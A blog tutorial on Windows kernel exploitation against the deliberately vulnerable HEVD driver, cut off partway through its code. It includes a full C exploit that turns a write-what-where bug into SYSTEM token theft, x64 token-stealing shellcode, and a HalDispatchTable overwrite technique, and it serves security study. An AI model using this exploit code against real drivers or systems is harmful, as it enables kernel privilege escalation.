Windows Kernel Exploitation - Part Three

Arbitrary Overwrite, kCFG, and SMEP

Posted Jun 14, 2026

By ,

97 min read

From Stack Smashing to Kernel Housekeeping

In the last post, we took the classic route: finding a stack buffer overflow, controlling RIP, dealing with SMEP, and eventually ROPing our way into shellcode execution. That was a good starting point because it showed how a simple memory corruption bug can turn into code execution in kernel mode. But kernel exploitation is not always about smashing the stack and jumping to shellcode. Sometimes the real goal is to build a useful primitive: the ability to write to kernel memory, reuse freed objects, confuse object layouts, or influence how the kernel interprets our data. In this post, we’ll continue working with HEVD and look at Arbitrary Overwrite,. The goal is not just to crash the VM again, although we probably will, but to understand what each bug gives us as an attacker and how those primitives map to real-world driver exploitation.

Write-What-Where: The Kernel’s Worst Customer Service Feature

IDA, Tell Me Where It Hurts

We start with Arbitrary Write. Or better known as Write-What-Where. The name will make sense in a short while. Because we’re working with HEVD, it nicely writes the vulnerabilities that we can work with. Looking at it in IDA, we can see the IOCTL call that we need is 0x22200B

We can follow this sub function and find the pseudo code for this vulnerability.

We can make some changes for it to be more readable. The last line will become

  
*Where = *What;

This function expects the user to pass a small structure containing two pointers: What and Where. The What field points to the value that should be copied, and the Where field points to the destination where that value should be written. The problem is that both of these pointers are user controlled. The driver only probes the outer structure, then blindly dereferences the inner pointers and performs *Where = *What. Because this code runs in kernel mode, this becomes an arbitrary kernel write primitive.

The 0x10 value comes from the size of the input structure expected by this IOCTL. The structure contains two 64-bit pointers: What and Where. Since each pointer is 8 bytes on x64, the full structure is 16 bytes, or 0x10. The ProbeForRead() call is supposed to make sure the user-mode pointer passed to the driver is readable before the kernel dereferences it. This kind of validation is common in legitimate drivers, especially when using IOCTLs that receive user-controlled input. A driver may need to receive a structure from user mode describing an operation, a buffer, a configuration value, or a request to perform some device-specific action. The bug is not that the driver receives a structure from user mode. That part is normal. The bug is that the driver trusts the pointers inside that structure. ProbeForRead() only checks that the 16-byte WRITE_WHAT_WHERE structure is readable. It does not prove that What is a safe address to read from, and it definitely does not prove that Where is a safe address to write to. Since both pointers are fully controlled by the caller, the final assignment *Where = *What gives user mode the ability to write an arbitrary 8-byte value to an arbitrary address from kernel mode. This vulnerability is basically the driver saying, “Sure, I’ll write whatever you want, wherever you want — what could possibly go wrong?”

The Dangerous Art of “Put This There”

I’ll be reusing the code for the exploit from previous post. It becomes

  
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <Psapi.h>
#include <stdlib.h>

#define QWORD ULONGLONG

// Defining the IOCTL and the DeviceName
#define HEVD_IOCTL_ARBITRARY_WRITE 0x22200B
#define DEVICE_NAME L"\\\\.\\HackSysExtremeVulnerableDriver"

// Defining a struct
typedef struct _WRITE_WHAT_WHERE
{
    QWORD* What;
    QWORD* Where;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

int main()
{
    printf("[+] Opening %ls\n", DEVICE_NAME);

    // Creating a handle
    HANDLE hDevice = CreateFileW(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        0,
        nullptr,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        nullptr
    );

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFileW failed. Error=%lu\n", GetLastError());
        return 1;
    }

    QWORD whatValue = 0x4141414141414141ULL;
    QWORD whereValue = 0x4242424242424242ULL;

    WRITE_WHAT_WHERE request = { 0 };

    request.What = &whatValue;
    request.Where = &whereValue;

    printf("[+] What pointer:        0x%p\n", request.What);
    printf("[+] Where pointer:       0x%p\n", request.Where);

    printf("[+] *What Contains:        0x%llx\n", whatValue);
    printf("[+] *Where Contains:       0x%llx\n", whereValue);

    printf("[+] Press Enter to exit...\n");
    getchar();

    printf("[+] Sending vulnerable IOCTL: 0x%X for ARBITRARY_WRITE\n", HEVD_IOCTL_ARBITRARY_WRITE);

    DWORD bytesReturned = 0;

    BOOL ok = DeviceIoControl(
        hDevice,
        HEVD_IOCTL_ARBITRARY_WRITE,
        &request,
        sizeof(request),
        nullptr,
        0,
        &bytesReturned,
        nullptr
    );

    if (!ok)
    {
        wprintf(L"[-] DeviceIoControl failed. Error=%lu\n", GetLastError());
    }
    else
    {
        wprintf(L"[+] DeviceIoControl returned successfully\n");
    }

    CloseHandle(hDevice);

    return 0;
}

This is a safe way to confirm the arbitrary overwrite behavior without touching sensitive kernel memory. The code opens a handle to the HEVD device and builds a WRITE_WHAT_WHERE structure containing two pointers: What points to a user-mode variable holding 0x4141414141414141, and Where points to another user-mode variable initially holding 0x4242424242424242. When the IOCTL is sent, the vulnerable driver receives this 16-byte structure and performs the dangerous operation *Where = *What. Since both pointers are controlled by us, the driver copies the value from the What address into the Where address. After DeviceIoControl() returns, the destination value changes from 0x4242424242424242 to 0x4141414141414141, proving that the driver gave us a working write-what-where primitive. In this first test, both addresses are harmless user-mode variables, but the same primitive becomes dangerous when Where is changed to a meaningful kernel address. We’ve added in getchar() so we can pause execution and look over the structures. When the execution pauses, we can look over at the values to see if our values populated the pointers.

0: kd> dq 0x000000C5080FFE28 L1
000000c5`080ffe28  41414141`41414141
0: kd> dq 0x000000C5080FFE30 L1
000000c5`080ffe30  42424242`42424242

The values in the pointers are now populated with our supplied values. That’s great. A point to note is that this logic can also be replaced. Right now we are providing it with data to write at a location. We can provide it with the location of a kernel space address and abuse this primitive to write it to a user controlled address as well to read required addresses.

No ROP, No Shellcode, Just Vibes

This can be done following 2 functions. One for read and one for write. The read function will take our device handle and a kernel address to read from, while the write function takes the kernel address to write in and the value we want to write.

  
QWORD ReadQWORD(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD value = 0;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        (QWORD*)kernelAddress,
        &value
    );

    if (!ok)
    {
        printf("[-] ReadQWORD failed at 0x%llx. Error=%lu\n", kernelAddress, GetLastError());
    }

    return value;
}

BOOL WriteQWORD(HANDLE hDevice, QWORD kernelAddress, QWORD valueToWrite)
{
    QWORD value = valueToWrite;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        &value,
        (QWORD*)kernelAddress
    );

    if (!ok)
    {
        printf("[-] WriteQWORD failed at 0x%llx. Error=%lu\n", kernelAddress, GetLastError());
    }

    return ok;
}

To trigger this primitive, we can write another function around it. This can basically invert the WHAT and WHERE when READ or WRITE is called.

  
BOOL TriggerWriteWhatWhere(HANDLE hDevice, QWORD* what, QWORD* where)
{
    WRITE_WHAT_WHERE request = { 0 };

    request.What = what;
    request.Where = where;

    DWORD bytesReturned = 0;

    return DeviceIoControl(
        hDevice,
        HEVD_IOCTL_ARBITRARY_WRITE,
        &request,
        sizeof(request),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
}

This is the point where the vulnerability becomes more useful. We now have a tiny kernel memory API built out of a bug. ReadQWORD() lets us inspect kernel structures, and WriteQWORD() lets us modify them. From here, we can locate PsInitialSystemProcess, walk the ActiveProcessLinks list, find our own process, and overwrite its token with the SYSTEM token. At this point the driver has accidentally become a very cursed version of memcpy-as-a-service. I’ll reuse my previous code to find NT base address

  
QWORD getBaseAddr(LPCWSTR driverName)
{
    LPVOID drivers[1024];
    DWORD cbNeeded = 0;

    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded))
    {
        printf("[!] EnumDeviceDrivers failed: %lu\n", GetLastError());
        return 0;
    }

    int driverCount = cbNeeded / sizeof(drivers[0]);

    for (int i = 0; i < driverCount; i++)
    {
        WCHAR currentDriverName[MAX_PATH];

        if (GetDeviceDriverBaseNameW(
            drivers[i],
            currentDriverName,
            MAX_PATH
        ))
        {
            if (_wcsicmp(currentDriverName, driverName) == 0)
            {
                return (QWORD)drivers[i];
            }
        }
    }

    printf("[!] Could not find driver: %ws\n", driverName);
    return 0;
}

And we can get it the same as before

  
QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");

if (!ntBase)
{
    printf("[-] Failed to get ntoskrnl.exe base address\n");
    CloseHandle(hDevice);
    return 1;
}

printf("[+] ntoskrnl.exe base:                  0x%llx\n", ntBase);

From here on, we can start to build up on our token stealing payload without the need for RCE. The thought process is this

Use arbitrary write as arbitrary read/write.
Find SYSTEM EPROCESS.
Read SYSTEM token.
Find your current process EPROCESS.
Overwrite your process Token field.
Spawn cmd.exe.

How does this happen? Well, we’re going to need a few offsets. We need to know what offset does UniqueProcessId, ActiveProcessLinks, and Token are first. Since the goal is to copy the SYSTEM token into our current process, we need these offsets in the _EPROCESS structure. WinDbg gives us these directly:

0: kd> dt nt!_EPROCESS UniqueProcessId ActiveProcessLinks Token
   +0x440 UniqueProcessId    : Ptr64 Void
   +0x448 ActiveProcessLinks : _LIST_ENTRY
   +0x4b8 Token              : _EX_FAST_REF
0: kd> ? nt!PsInitialSystemProcess - nt
Evaluate expression: 13616160 = 00000000`00cfc420
0: kd> dq nt!PsInitialSystemProcess L1
fffff801`50afc420  ffffb68f`3887d040

This means that the process for offsets becomes

EPROCESS + 0x440 = UniqueProcessId
EPROCESS + 0x448 = ActiveProcessLinks
EPROCESS + 0x4b8 = Token

We will use UniqueProcessId to identify our own process while walking the process list. ActiveProcessLinks lets us move from one _EPROCESS object to the next. Once we find the process whose PID matches our exploit process, we can overwrite its Token field with the token from the SYSTEM process.

Next, we need a reliable way to find the SYSTEM process. Windows exposes a kernel global variable called PsInitialSystemProcess, which points to the _EPROCESS structure for the SYSTEM process. Because of KASLR, we do not want to hardcode the full runtime address. Instead, we calculate its offset from the base of ntoskrnl.exe:

0: kd> ? nt!PsInitialSystemProcess - nt
Evaluate expression: 13616160 = 00000000`00cfc420

So in the exploit, we can define:

#define PS_INITIAL_SYSTEM_PROCESS_OFFSET 0x00cfc420ULL

Then at runtime:

QWORD psInitialSystemProcessAddress = ntBase + PS_INITIAL_SYSTEM_PROCESS_OFFSET;

Finally, this command shows the actual value stored at PsInitialSystemProcess:

0: kd> dq nt!PsInitialSystemProcess L1
fffff801`50afc420  ffffb68f`3887d040

This means:

PsInitialSystemProcess address = fffff801`50afc420
Value stored there             = ffffb68f`3887d040

That stored value is the address of the SYSTEM process’s _EPROCESS structure. In code, we read it like this:

  
QWORD systemEprocess = ReadQWORD(hDevice, psInitialSystemProcessAddress);

From there, the exploit reads:

  
QWORD systemToken = ReadQWORD(hDevice, systemEprocess + TOKEN_OFFSET);

Then it walks the ActiveProcessLinks list until it finds the current process PID:

  
QWORD pid = ReadQWORD(hDevice, current + UNIQUE_PROCESS_ID_OFFSET);
QWORD flink = ReadQWORD(hDevice, current + ACTIVE_PROCESS_LINKS_OFFSET);
current = flink - ACTIVE_PROCESS_LINKS_OFFSET;

This happens in a loop defined as this

  
for (int i = 0; i < 1024; i++)
{
    QWORD pid = ReadQWORD(hDevice, current + UNIQUE_PROCESS_ID_OFFSET);

    if ((DWORD)pid == currentPid)
    {
        currentEprocess = current;
        break;
    }

    QWORD flink = ReadQWORD(hDevice, current + ACTIVE_PROCESS_LINKS_OFFSET);

    if (!flink)
    {
        printf("[-] ActiveProcessLinks Flink is NULL\n");
        CloseHandle(hDevice);
        return 1;
    }

    current = flink - ACTIVE_PROCESS_LINKS_OFFSET;
}

if (!currentEprocess)
{
    printf("[-] Failed to find current process EPROCESS\n");
    CloseHandle(hDevice);
    return 1;
}

Once the current process is found, the final write is simply:

  
WriteQWORD(hDevice, currentEprocess + TOKEN_OFFSET, finalToken);

The entire thing put together looks like this

  
#include <windows.h>
#include <stdio.h>
#include <Psapi.h>
#include <stdlib.h>

#pragma comment(lib, "Psapi.lib")

#define QWORD ULONGLONG

// Defining the IOCTL and the DeviceName
#define HEVD_IOCTL_ARBITRARY_WRITE 0x22200B
#define DEVICE_NAME L"\\\\.\\HackSysExtremeVulnerableDriver"

// Offsets for EPROCESS structure
// dt nt!_EPROCESS UniqueProcessId ActiveProcessLinks Token
#define UNIQUE_PROCESS_ID_OFFSET 0x440ULL
#define ACTIVE_PROCESS_LINKS_OFFSET 0x448ULL
#define TOKEN_OFFSET 0x4b8ULL

// ? nt!PsInitialSystemProcess - nt
#define PS_INITIAL_SYSTEM_PROCESS_OFFSET 0x00cfc420ULL

// Defining a struct
typedef struct _WRITE_WHAT_WHERE
{
    QWORD* What;
    QWORD* Where;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

BOOL TriggerWriteWhatWhere(HANDLE hDevice, QWORD* what, QWORD* where)
{
    WRITE_WHAT_WHERE request = { 0 };

    request.What = what;
    request.Where = where;

    DWORD bytesReturned = 0;

    return DeviceIoControl(
        hDevice,
        HEVD_IOCTL_ARBITRARY_WRITE,
        &request,
        sizeof(request),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
}

QWORD ReadQWORD(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD value = 0;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        (QWORD*)kernelAddress,
        &value
    );

    if (!ok)
    {
        printf("[-] ReadQWORD failed at 0x%llx. Error=%lu\n", kernelAddress, GetLastError());
    }

    return value;
}

BOOL WriteQWORD(HANDLE hDevice, QWORD kernelAddress, QWORD valueToWrite)
{
    QWORD value = valueToWrite;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        &value,
        (QWORD*)kernelAddress
    );

    if (!ok)
    {
        printf("[-] WriteQWORD failed at 0x%llx. Error=%lu\n", kernelAddress, GetLastError());
    }

    return ok;
}

// Finding NT Base address
QWORD getBaseAddr(LPCWSTR driverName)
{
    LPVOID drivers[1024];
    DWORD cbNeeded = 0;

    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded))
    {
        printf("[!] EnumDeviceDrivers failed: %lu\n", GetLastError());
        return 0;
    }

    int driverCount = cbNeeded / sizeof(drivers[0]);

    for (int i = 0; i < driverCount; i++)
    {
        WCHAR currentDriverName[MAX_PATH];

        if (GetDeviceDriverBaseNameW(
            drivers[i],
            currentDriverName,
            MAX_PATH
        ))
        {
            if (_wcsicmp(currentDriverName, driverName) == 0)
            {
                return (QWORD)drivers[i];
            }
        }
    }

    printf("[!] Could not find driver: %ws\n", driverName);
    return 0;
}

int main()
{
    printf("[+] Opening %ls\n", DEVICE_NAME);

    // Creating a handle
    HANDLE hDevice = CreateFileW(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        0,
        nullptr,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        nullptr
    );

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFileW failed. Error=%lu\n", GetLastError());
        return 1;
    }

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");

    if (!ntBase)
    {
        printf("[-] Failed to get ntoskrnl.exe base address\n");
        CloseHandle(hDevice);
        return 1;
    }

    printf("[+] ntoskrnl.exe base:                  0x%llx\n", ntBase);

    QWORD psInitialSystemProcessAddress = ntBase + PS_INITIAL_SYSTEM_PROCESS_OFFSET;

    printf("[+] PsInitialSystemProcess address:     0x%llx\n", psInitialSystemProcessAddress);

    QWORD systemEprocess = ReadQWORD(hDevice, psInitialSystemProcessAddress);

    if (!systemEprocess)
    {
        printf("[-] Failed to read SYSTEM EPROCESS\n");
        CloseHandle(hDevice);
        return 1;
    }

    printf("[+] SYSTEM EPROCESS:                    0x%llx\n", systemEprocess);

    QWORD systemToken = ReadQWORD(hDevice, systemEprocess + TOKEN_OFFSET);
    QWORD cleanSystemToken = systemToken & ~0xFULL;

    printf("[+] SYSTEM Token:                       0x%llx\n", systemToken);
    printf("[+] SYSTEM Token cleaned:               0x%llx\n", cleanSystemToken);

    DWORD currentPid = GetCurrentProcessId();

    printf("[+] Current PID:                        %lu\n", currentPid);

    QWORD currentEprocess = 0;
    QWORD current = systemEprocess;

    for (int i = 0; i < 1024; i++)
    {
        QWORD pid = ReadQWORD(hDevice, current + UNIQUE_PROCESS_ID_OFFSET);

        if ((DWORD)pid == currentPid)
        {
            currentEprocess = current;
            break;
        }

        QWORD flink = ReadQWORD(hDevice, current + ACTIVE_PROCESS_LINKS_OFFSET);

        if (!flink)
        {
            printf("[-] ActiveProcessLinks Flink is NULL\n");
            CloseHandle(hDevice);
            return 1;
        }

        current = flink - ACTIVE_PROCESS_LINKS_OFFSET;
    }

    if (!currentEprocess)
    {
        printf("[-] Failed to find current process EPROCESS\n");
        CloseHandle(hDevice);
        return 1;
    }

    printf("[+] Current EPROCESS:                   0x%llx\n", currentEprocess);

    QWORD currentTokenAddress = currentEprocess + TOKEN_OFFSET;
    QWORD currentToken = ReadQWORD(hDevice, currentTokenAddress);

    printf("[+] Current Token address:              0x%llx\n", currentTokenAddress);
    printf("[+] Current Token before:               0x%llx\n", currentToken);

    QWORD currentTokenRefBits = currentToken & 0xFULL;
    QWORD finalToken = cleanSystemToken | currentTokenRefBits;

    printf("[+] Current Token ref bits:             0x%llx\n", currentTokenRefBits);
    printf("[+] Final token to write:               0x%llx\n", finalToken);

    if (!WriteQWORD(hDevice, currentTokenAddress, finalToken))
    {
        printf("[-] Failed to overwrite current process token\n");
        CloseHandle(hDevice);
        return 1;
    }

    QWORD verifyToken = ReadQWORD(hDevice, currentTokenAddress);

    printf("[+] Current Token after:                0x%llx\n", verifyToken);

    if ((verifyToken & ~0xFULL) == cleanSystemToken)
    {
        printf("[+] Token overwrite successful\n");
        printf("[+] Spawning cmd.exe\n");
        system("cmd.exe");
    }
    else
    {
        printf("[-] Token overwrite verification failed\n");
    }

    CloseHandle(hDevice);
    return 0;
}

Run this and we get elevated privileges

Fine, Let’s Make It Loud

The previous method was quiet and elegant: no shellcode, no ROP, no direct code execution. We simply used the arbitrary write primitive to modify our process token and become SYSTEM. But arbitrary overwrite can also be abused in a louder way. Instead of only modifying kernel data, we can use the primitive to make our user-mode shellcode executable from kernel mode, redirect execution through a kernel callback path, and turn the bug into full kernel code execution. This is where things get more painful, more fragile, and significantly more likely to make WinDBG your emotional support animal.

HalDispatchTable: Windows Callback Roulette

At this point, our arbitrary overwrite gives us a very dangerous primitive: we can write a value of our choice to a kernel address of our choice. But that still leaves us with an important question: where do we write?

A write primitive does not magically give us code execution. It only lets us corrupt memory. To turn that corruption into execution, we need to overwrite something that the kernel will later treat as a control flow target. In other words, we need the kernel to eventually load our corrupted value and call or jump to it.

This is where the classic HalDispatchTable technique comes in.

HalDispatchTable is an internal kernel dispatch table related to the Windows Hardware Abstraction Layer. The HAL exists so Windows can interact with hardware-specific functionality through a common interface instead of hardcoding every hardware detail directly into the kernel. Some HAL-related operations are reached through function pointers stored in dispatch tables. A function pointer is simply an address that says, “when this operation is needed, call the function located here.”

Normally, entries inside HalDispatchTable point to legitimate HAL routines. The kernel follows those pointers during specific system operations, calls the correct HAL routine, receives the result, and continues as normal.

The exploitation idea is simple: if we can overwrite one of those function pointers, we can make the kernel call an address of our choosing.

So instead of this:

Kernel path -> HalDispatchTable entry -> legitimate HAL routine

we try to create this:

Kernel path -> HalDispatchTable entry -> attacker-controlled payload

The table itself is not the vulnerability. The vulnerability is still the arbitrary overwrite in the driver. HalDispatchTable is just the target we abuse after we already have that write primitive. It acts as a bridge between “I can write to kernel memory” and “I can redirect kernel execution.”

Historically, the common trigger for this technique was NtQueryIntervalProfile. From user mode, an exploit could call this native API. The call would transition into the kernel, pass through the kernel’s profile query handling path, and eventually reach a HAL dispatch routine through HalDispatchTable. If the relevant table entry had been overwritten, the kernel would indirectly call the attacker controlled address instead of the original HAL function.

This and so much more is beautifully explained here: https://connormcgarr.github.io/Kernel-Exploitation-2/. This dude is a genius.

The flow looks like this:

User mode
    |
    | call NtQueryIntervalProfile()
    v
Kernel mode
    |
    | profile query handling
    v
Read function pointer from HalDispatchTable
    |
    | indirect call
    v
Execution reaches overwritten pointer
    |
    v
Kernel payload runs

This is why the technique became so famous in older Windows kernel exploitation. It gave exploit writers a predictable place to aim an arbitrary write and a predictable way to trigger the corrupted pointer afterward.

However, there are a few important details that make or break the exploit.

First, the original function pointer should be saved before overwriting it. HalDispatchTable is part of the operating system’s normal kernel machinery. If we corrupt it and leave it corrupted, the machine can crash when the same path is used again. A clean exploit should restore the original pointer after the payload has executed.

Second, the payload address must be executable from kernel mode. On old systems, attackers often pointed the table entry directly at shellcode sitting in user mode memory. On modern systems, SMEP breaks that approach because the CPU prevents supervisor mode code from executing instructions from user pages. That means the exploit needs an additional bypass or a different payload placement strategy.

Third, this technique is noisy and fragile on modern x64 Windows. Kernel Patch Protection, KASLR, Kernel CFG, HVCI, and other mitigations make global kernel function pointer overwrites much less reliable than they were in older writeups. PatchGuard may notice protected kernel structures being modified. KASLR means addresses must be resolved dynamically. Kernel CFG may validate indirect calls. HVCI can restrict writable/executable kernel memory behavior.

So the main lesson is not “HalDispatchTable is the best modern exploitation method.” The real lesson is that HalDispatchTable shows a classic exploitation pattern:

Find a trusted kernel function pointer.
Overwrite it using a memory corruption primitive.
Trigger a legitimate kernel path that calls it.
Use that call to gain kernel execution.
Restore state before the system falls over.

In our exploit journey, this technique is useful because it teaches how arbitrary write can become code execution. The vulnerable driver gives us the write. HalDispatchTable gives us the control flow target. The trigger path gives us the call. After that, the kernel payload performs the familiar token stealing step to turn the current process into SYSTEM. In other words: the vulnerable driver gives us the pen, HalDispatchTable gives us the signature line, and NtQueryIntervalProfile makes Windows unknowingly sign the cheque.

Building the Exploit

For now, I’m working with a Windows 10 VM with SMEP disabled.

The same token stealing payload can be reused because the actual privilege escalation logic does not depend on the original vulnerability. Whether execution is gained through a stack overflow, a corrupted dispatch table, or some other control flow hijack, the payload still needs to locate the current process, find the SYSTEM process, copy the SYSTEM token, and replace the current process token. What changes is the wrapper around the payload. In the stack overflow exploit, the shellcode had to survive a corrupted stack frame. In the HalDispatchTable technique, the payload is reached through a kernel function pointer call, so it should behave more like a normal called function: save registers, perform the token swap, restore state, and return cleanly.

We do still need to clean up, but not in the same way as the stack overflow exploit. In the stack overflow version, the shellcode had to recover from a smashed control-flow path and manually return to user mode. In the HalDispatchTable version, the payload is called like a kernel function, so the cleanup is simpler: save registers, steal the token, restore registers, and return with ret.

  
[BITS 64]

_start:
    ; Save state.
    pushfq
    push rbx
    push rcx
    push rdx
    push rsi
    push rdi
    push rbp
    push r8
    push r9
    push r10
    push r11
    push r12
    push r13
    push r14
    push r15

    ; Get current _EPROCESS
    mov rax, [gs:0x188]          ; Current _KTHREAD
    mov rax, [rax + 0xb8]        ; Current _EPROCESS
    mov rbx, rax                 ; Save current _EPROCESS in RBX

    ; Start walking ActiveProcessLinks
    mov r12, rax

find_system:
    mov r12, [r12 + 0x448]       ; Flink: next ActiveProcessLinks
    sub r12, 0x448               ; Back to containing _EPROCESS

    mov r13, [r12 + 0x440]       ; UniqueProcessId
    cmp r13, 4                   ; PID 4 == SYSTEM
    jne find_system

steal_token:
    mov r13, [r12 + 0x4b8]       ; SYSTEM Token
    and r13, 0xfffffffffffffff0  ; Clear SYSTEM token ref-count bits

    mov r14, [rbx + 0x4b8]       ; Current process Token
    and r14, 0xf                 ; Preserve current token ref-count bits

    or r13, r14                  ; Final token = clean SYSTEM token + current ref bits
    mov [rbx + 0x4b8], r13       ; Replace current process token

done:
    ; Restore state
    pop r15
    pop r14
    pop r13
    pop r12
    pop r11
    pop r10
    pop r9
    pop r8
    pop rbp
    pop rdi
    pop rsi
    pop rdx
    pop rcx
    pop rbx
    popfq

    ; Return success-ish value.
    mov eax, 0

    ; Return to the original kernel caller
    ret

For the first HalDispatchTable version, we keep the lab simple and place the payload in user-mode executable memory. This keeps the exploit flow easy to understand: the arbitrary write corrupts the dispatch table, and the trigger redirects kernel execution to our payload. This only works when SMEP is disabled. Once SMEP is enabled, the same idea needs an additional bypass because the kernel can no longer execute code from user mode pages.

HalDispatchTable + 0x8 is commonly used with the NtQueryIntervalProfile trigger path. Explained in the blog here, this can be found by disassembling the API.

0: kd> uf nt!NtQueryIntervalProfile
......
nt!NtQueryIntervalProfile+0x3d:
fffff802`1092014d e822000000      call    nt!KeQueryIntervalProfile (fffff802`10920174)
fffff802`10920152 4084ff          test    dil,dil
fffff802`10920155 7412            je      nt!NtQueryIntervalProfile+0x59 (fffff802`10920169)  Branch
......
0: kd> uf nt!KeQueryIntervalProfile
......
nt!KeQueryIntervalProfile+0x1c:
fffff802`10920190 488b05d1084e00  mov     rax,qword ptr [**nt!HalDispatchTable+0x8** (fffff802`10e00a68)]
fffff802`10920197 4c8d4c2460      lea     r9,[rsp+60h]
fffff802`1092019c ba18000000      mov     edx,18h
fffff802`109201a1 894c2430        mov     dword ptr [rsp+30h],ecx
fffff802`109201a5 4c8d442430      lea     r8,[rsp+30h]
fffff802`109201aa 8d4ae9          lea     ecx,[rdx-17h]
fffff802`109201ad e82ee8cdff      call    nt!guard_dispatch_icall (fffff802`105fe9e0)
fffff802`109201b2 85c0            test    eax,eax
fffff802`109201b4 7819            js      nt!KeQueryIntervalProfile+0x5b (fffff802`109201cf)  Branch
.......

The Cursed GetProcAddress Arc

Okay I’ll be honest. Things got a lot messier here. We could just hardcode the value for HalDispatchTable by calculating the NT base from offset. However, I tried implementing a way I could dynamically resolve the address from the kernel at runtime (miserably).

A lot of the code has already been explained in the previous blogs so to understand those parts, I suggest giving them a read. I’ll just go over the changes.

We get the HDT following this

  
BYTE ReadBYTE(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD alignedAddress = kernelAddress & ~0x7ULL;
    QWORD value = ReadQWORD(hDevice, alignedAddress);

    DWORD shift = (DWORD)((kernelAddress & 0x7ULL) * 8);

    return (BYTE)((value >> shift) & 0xff);
}

WORD ReadWORD(HANDLE hDevice, QWORD kernelAddress)
{
    WORD value = 0;

    value |= (WORD)ReadBYTE(hDevice, kernelAddress);
    value |= (WORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;

    return value;
}

DWORD ReadDWORD(HANDLE hDevice, QWORD kernelAddress)
{
    DWORD value = 0;

    value |= (DWORD)ReadBYTE(hDevice, kernelAddress);
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 2) << 16;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 3) << 24;

    return value;
}

BOOL ReadKernelString(HANDLE hDevice, QWORD kernelAddress, char* buffer, DWORD maxLen)
{
    if (!buffer || maxLen == 0)
    {
        return FALSE;
    }

    for (DWORD i = 0; i < maxLen - 1; i++)
    {
        buffer[i] = (char)ReadBYTE(hDevice, kernelAddress + i);

        if (buffer[i] == '\0')
        {
            return TRUE;
        }
    }

    buffer[maxLen - 1] = '\0';
    return TRUE;
}

QWORD ResolveKernelExport(HANDLE hDevice, QWORD imageBase, const char* targetExport)
{
    WORD mz = ReadWORD(hDevice, imageBase);

    if (mz != 0x5A4D) // MZ
    {
        printf("[-] Invalid DOS header. Expected MZ, got 0x%04x\n", mz);
        return 0;
    }

    DWORD e_lfanew = ReadDWORD(hDevice, imageBase + 0x3c);
    QWORD ntHeaders = imageBase + e_lfanew;

    DWORD peSignature = ReadDWORD(hDevice, ntHeaders);

    if (peSignature != 0x00004550) // PE\0\0
    {
        printf("[-] Invalid PE signature. Got 0x%08lx\n", peSignature);
        return 0;
    }

    QWORD optionalHeader = ntHeaders + 0x18;

    WORD magic = ReadWORD(hDevice, optionalHeader);

    if (magic != 0x20b) // PE32+
    {
        printf("[-] Not a PE32+ image. OptionalHeader.Magic = 0x%04x\n", magic);
        return 0;
    }

    DWORD exportDirectoryRva = ReadDWORD(hDevice, optionalHeader + 0x70);

    if (!exportDirectoryRva)
    {
        printf("[-] Export directory RVA is NULL\n");
        return 0;
    }

    QWORD exportDirectory = imageBase + exportDirectoryRva;

    DWORD numberOfNames = ReadDWORD(hDevice, exportDirectory + 0x18);
    DWORD addressOfFunctionsRva = ReadDWORD(hDevice, exportDirectory + 0x1c);
    DWORD addressOfNamesRva = ReadDWORD(hDevice, exportDirectory + 0x20);
    DWORD addressOfNameOrdinalsRva = ReadDWORD(hDevice, exportDirectory + 0x24);

    QWORD addressOfFunctions = imageBase + addressOfFunctionsRva;
    QWORD addressOfNames = imageBase + addressOfNamesRva;
    QWORD addressOfNameOrdinals = imageBase + addressOfNameOrdinalsRva;

    printf("[+] Export directory:        0x%llx\n", exportDirectory);
    printf("[+] NumberOfNames:           %lu\n", numberOfNames);

    for (DWORD i = 0; i < numberOfNames; i++)
    {
        DWORD nameRva = ReadDWORD(
            hDevice,
            addressOfNames + (i * sizeof(DWORD))
        );

        QWORD nameAddress = imageBase + nameRva;

        char exportName[256] = { 0 };

        ReadKernelString(
            hDevice,
            nameAddress,
            exportName,
            sizeof(exportName)
        );

        if (strcmp(exportName, targetExport) == 0)
        {
            WORD ordinal = ReadWORD(
                hDevice,
                addressOfNameOrdinals + (i * sizeof(WORD))
            );

            DWORD functionRva = ReadDWORD(
                hDevice,
                addressOfFunctions + (ordinal * sizeof(DWORD))
            );

            QWORD functionAddress = imageBase + functionRva;

            printf("[+] Found export:            %s\n", exportName);
            printf("[+] Export ordinal:          %u\n", ordinal);
            printf("[+] Export RVA:              0x%lx\n", functionRva);
            printf("[+] Export address:          0x%llx\n", functionAddress);

            return functionAddress;
        }
    }

    printf("[-] Export not found: %s\n", targetExport);
    return 0;
}

QWORD ResolveHalDispatchTable(HANDLE hDevice, QWORD ntBase)
{
    QWORD halDispatchTable = 0;

    printf("[+] Trying dynamic HalDispatchTable export resolution...\n");

    halDispatchTable = ResolveKernelExport(
        hDevice,
        ntBase,
        "HalDispatchTable"
    );

    if (halDispatchTable)
    {
        printf("[+] Dynamic HalDispatchTable resolution succeeded\n");
        return halDispatchTable;
    }

    printf("[!] Dynamic HalDispatchTable resolution failed\n");
    printf("[!] Falling back to hardcoded WinDBG offset: 0x%llx\n",
        HALDISPATCHTABLE_FALLBACK_OFFSET
    );

